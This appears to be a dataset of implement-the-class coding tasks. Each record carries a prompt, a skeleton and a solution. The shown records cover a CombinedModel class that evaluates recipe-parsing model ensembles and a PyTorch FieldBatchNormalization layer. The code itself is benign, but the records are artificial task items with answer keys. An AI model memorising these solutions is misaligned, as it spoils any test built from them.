EnsembledModel()\n for model in models:\n ensemble.add_model(model)\n return ensemble\n<|end_body_2|>\n\n<|body_start_3|>\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n<|end_body_3|>\n\n<|body_start_4|>\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n<|end_body_4|>\n", "class_docstring": "Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo", "class_name": "CombinedModel", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. 
Defaults to `True`.:\"\"\"\n <|body_0|>\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n <|body_1|>\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n <|body_2|>\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n <|body_3|>\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n<|end_body_0|>\n\n<|body_start_1|>\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = EnsembledModel()\n for 
model in models:\n ensemble.add_model(model)\n return ensemble\n<|end_body_2|>\n\n<|body_start_3|>\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n<|end_body_3|>\n\n<|body_start_4|>\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000480", "length_bytes": 33655, "license_type": "no_license", "methods": [{"docstring": "Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:", "name": "__init__", "signature": "def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True)"}, {"docstring": "Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.", "name": "test_models", "signature": "def test_models(self)"}, {"docstring": "Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.", "name": "create_ensemble", "signature": "def create_ensemble(args, model_class)"}, {"docstring": "Logs command-line arguments.", "name": "_log_args", "signature": "def _log_args(self, args)"}, {"docstring": "Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. 
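The `_log_args` body above derives the logging level from a command-line string via `getattr(logging, args.log_level.upper())`, which maps e.g. 'info' to `logging.INFO`. A self-contained demo of that pattern, with the level string standing in for `args.log_level`:

```python
import logging

level_name = 'info'  # stand-in for args.log_level
logging.basicConfig(level=getattr(logging, level_name.upper()),
                    format='%(levelname)s: %(asctime)s: %(message)s')
logging.info('Log Level: %s', level_name)  # emitted, since INFO >= INFO
```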
Args: config: A configuration class, similar to `configs.PaperConfigurations`.", "name": "_log_configurations", "signature": "def _log_configurations(config)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_005752", "prompt": "Implement the Python class `CombinedModel` described below.\n\nClass description:\nModel class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\n\nMethod signatures and docstrings:\n- def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True): Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\n- def test_models(self): Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\n- def create_ensemble(args, model_class): Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\n- def _log_args(self, args): Logs command-line arguments.\n- def _log_configurations(config): Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.", "prompted_full_text": "Implement the Python class `CombinedModel` described below.\n\nClass description:\nModel class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. 
use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\n\nMethod signatures and docstrings:\n- def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True): Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\n- def test_models(self): Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\n- def create_ensemble(args, model_class): Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\n- def _log_args(self, args): Logs command-line arguments.\n- def _log_configurations(config): Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\n\n<|skeleton|>\nclass CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. 
use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\"\"\"\n <|body_0|>\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n <|body_1|>\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n <|body_2|>\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n <|body_3|>\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n<|end_body_0|>\n\n<|body_start_1|>\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n<|end_body_1|>\n\n<|body_start_2|>\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n 
model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = EnsembledModel()\n for model in models:\n ensemble.add_model(model)\n return ensemble\n<|end_body_2|>\n\n<|body_start_3|>\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n<|end_body_3|>\n\n<|body_start_4|>\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n<|end_body_4|>\n", "revision_id": "578323676c040f881d79e6dfae96522639fdb753", "skeleton": "<|skeleton|>\nclass CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\"\"\"\n <|body_0|>\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. 
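`test_models` above aggregates per-model boolean mistake vectors with `|`, so an example counts as wrong whenever any component model mispredicts it; the combined error is therefore at least as large as each individual error. A stripped-down numpy illustration of that aggregation (the masks are fabricated):

```python
import numpy as np

# Boolean mistake masks from two models over the same 6 test examples.
trigger_mistakes = np.array([0, 1, 0, 0, 1, 0], dtype=bool)
action_mistakes  = np.array([0, 0, 0, 1, 1, 0], dtype=bool)

combined = trigger_mistakes | action_mistakes   # wrong if either is wrong
print(trigger_mistakes.mean())   # 0.333... individual error
print(action_mistakes.mean())    # 0.333... individual error
print(combined.mean())           # 0.5      combined error
```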
This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n <|body_1|>\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n <|body_2|>\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n <|body_3|>\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CombinedModel:\n \"\"\"Model class that combines different types of models -- such as `TriggerChannelModel`, `ActionChannelModel`, and `EnsembledModel` -- and exposes methods to enable them to be evaluated or used on the same set of examples or inputs. Attributes: use_trigger_channel_model (bool): Set to `True` if the trained `TriggerChannelModel` is to be included in the cocktail of models. use_action_channel_model (bool): Set to `True` if the trained `ActionChannelModel` is to be included in the cocktail of models. use_action_fn_model (bool): Set to `True` if the trained `ActionFunctionModel` is to be included in the cocktail of models. use_trigger_fn_model (bool): Set to `True` if the trained `TriggerFunctionMo\"\"\"\n\n def __init__(self, use_trigger_channel_model=True, use_action_channel_model=True, use_trigger_fn_model=True, use_action_fn_model=True):\n \"\"\"Sets which types of models to include in the cocktail of models to be used together. Args: use_trigger_channel_model (bool): Add an ensemble of `TriggerChannelModel` models to the cocktail of models if `True`. Defaults to `True`. use_action_channel_model (bool): Add an ensemble of `ActionChannelModel` models to the cocktail of models if `True`. Defaults to `True`.: use_trigger_fn_model (bool): Add an ensemble of `TriggerFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.: use_action_fn_model (bool): Add an ensemble of `ActionFunctionModel` models to the cocktail of models if `True`. Defaults to `True`.:\"\"\"\n self.use_trigger_channel_model = use_trigger_channel_model\n self.use_action_channel_model = use_action_channel_model\n self.use_trigger_fn_model = use_trigger_fn_model\n self.use_action_fn_model = use_action_fn_model\n\n def test_models(self):\n \"\"\"Evaluates the trained models on a common set of test examples. The models used are the ones for which the corresponding boolean is set to `True`. The evaluation is performed both individually and combined. 
This method can be used to evaluate different classes of models, such as `TriggerChannelModel` and `ActionChannelModel` on the common set of test examples, so as to determine their combined performance, such as the total error in predicting recipes' channels.\"\"\"\n args, model_classes = ([], [])\n if self.use_trigger_channel_model:\n args.append(self.t_channel_args)\n model_classes.append(TriggerChannelModel)\n if self.use_action_channel_model:\n args.append(self.a_channel_args)\n model_classes.append(ActionChannelModel)\n if self.use_trigger_fn_model:\n args.append(self.t_fn_args)\n model_classes.append(TriggerFunctionModel)\n if self.use_action_fn_model:\n args.append(self.a_fn_args)\n model_classes.append(ActionFunctionModel)\n ensembles = []\n for arg, model_class in zip(args, model_classes):\n ensembles.append(self.create_ensemble(arg, model_class))\n n = len(ensembles[0].test_data()[0])\n mistakes = np.array([False] * n)\n for ensemble in ensembles:\n inputs, labels, seq_lens = ensemble.test_data()\n m = ensemble.prediction_mistakes(inputs, labels, seq_lens)\n logging.info('Individual error = %s', np.mean(m))\n mistakes = mistakes | m\n error = np.mean(mistakes)\n logging.info('Combined Error = %s', error)\n\n def create_ensemble(args, model_class):\n \"\"\"Creates an ensemble of models defined by the `model_class` and passed command-line arguments `args`. The command-line arguments are used to create and restore desired models and subset of the test set. Args: args (Namespace): Namespace containing parsed arguments. model_class (:obj:`Model`): One of the child classes of the `Model` class. Returns: EnsembledModel: An ensembled model.\"\"\"\n assert len(args.experiment_name) == len(args.saved_model_path)\n config = configs.PaperConfiguration\n CombinedModel._log_configurations(config)\n num_models = len(args.experiment_name)\n models = []\n for i in xrange(num_models):\n with tf.Graph().as_default() as graph:\n logging.info('Model number %s', i)\n expt_path = RNN_EXPT_DIRECTORY + args.experiment_name[i] + '/'\n model = model_class(config, expt_path, stem=True)\n model.load_labels_and_vocab()\n model.load_test_dataset(external_csv_file=args.external_test_csv, use_full_test_set=args.use_full_test_set, use_english=args.use_english, use_english_intelligible=args.use_english_intelligible, use_gold=args.use_gold, use_names_descriptions=args.use_names_descriptions)\n model.initialize_network(init_variables=False, graph=graph)\n model.restore(args.saved_model_path[i])\n models.append(model)\n ensemble = EnsembledModel()\n for model in models:\n ensemble.add_model(model)\n return ensemble\n\n def _log_args(self, args):\n \"\"\"Logs command-line arguments.\"\"\"\n logging.basicConfig(level=getattr(logging, args.log_level.upper()), format='%(levelname)s: %(asctime)s: %(message)s')\n logging.info('Log Level: %s', args.log_level)\n logging.info('Experiment Name: %s', args.experiment_name)\n logging.info('Model: %s', args.model[0])\n logging.info('Saved Model Path: %s', args.saved_model_path)\n logging.info('Use Full Test Set: %s', args.use_full_test_set)\n logging.info('Use English Subset: %s', args.use_english)\n logging.info('Use English and Intelligible Subset: %s', args.use_english_intelligible)\n logging.info('Use Gold Subset: %s', args.use_gold)\n logging.info('Use Names and Descriptions: %s', args.use_names_descriptions)\n\n def _log_configurations(config):\n \"\"\"Logs the configurations being used. Configurations refer to the values for various hyper-parameters of the model. 
Args: config: A configuration class, similar to `configs.PaperConfigurations`.\"\"\"\n logging.info('Using the following configurations:')\n logging.info('hidden_size (d) = %s', config.hidden_size)\n logging.info('vocab_size (N) = %s', config.vocab_size)\n logging.info('sent_size (j) = %s', config.sent_size)\n", "source": "the_stack_v2_python_sparse", "source_path": "parser/combined_model.py", "source_repo": "shobhit6993/natural-language-to-code", "split": "test", "star_events_count": 1} {"blob_id": "d57f5ee4d6f892265e44cc204116135cc1ff7e94", "bodies": ["super(FieldBatchNormalization, self).__init__()\nself.bn = nn.BatchNorm1d(in_channel)\nself.in_channel = in_channel", "points = in_feature[:, :, :3]\nfeature = in_feature[:, :, 3:]\nfeature = feature.permute(0, 2, 1)\nassert len(points.shape) == 3, 'The input point cloud should be batched!'\nassert len(feature.shape) == 3, 'The input signed distance field should be batched!'\nassert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\nbn_feature = self.bn(feature)\nbn_feature = bn_feature.permute(0, 2, 1)\nout_feature = torch.cat([points, bn_feature], -1)\nreturn out_feature"], "bodies_text": "<|body_start_0|>\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n<|end_body_0|>\n\n<|body_start_1|>\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n<|end_body_1|>\n", "class_docstring": "Field convolution layer.", "class_name": "FieldBatchNormalization", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FieldBatchNormalization:\n \"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n <|body_0|>\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. 
(B, Nc, Fout)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n<|end_body_0|>\n\n<|body_start_1|>\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000481", "length_bytes": 1846, "license_type": "permissive", "methods": [{"docstring": "The initialization function. Args: in_channel: The number of input channels.", "name": "__init__", "signature": "def __init__(self, in_channel: int)"}, {"docstring": "The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)", "name": "forward", "signature": "def forward(self, in_feature: torch.Tensor)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005724", "prompt": "Implement the Python class `FieldBatchNormalization` described below.\n\nClass description:\nField convolution layer.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channel: int): The initialization function. Args: in_channel: The number of input channels.\n- def forward(self, in_feature: torch.Tensor): The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)", "prompted_full_text": "Implement the Python class `FieldBatchNormalization` described below.\n\nClass description:\nField convolution layer.\n\nMethod signatures and docstrings:\n- def __init__(self, in_channel: int): The initialization function. Args: in_channel: The number of input channels.\n- def 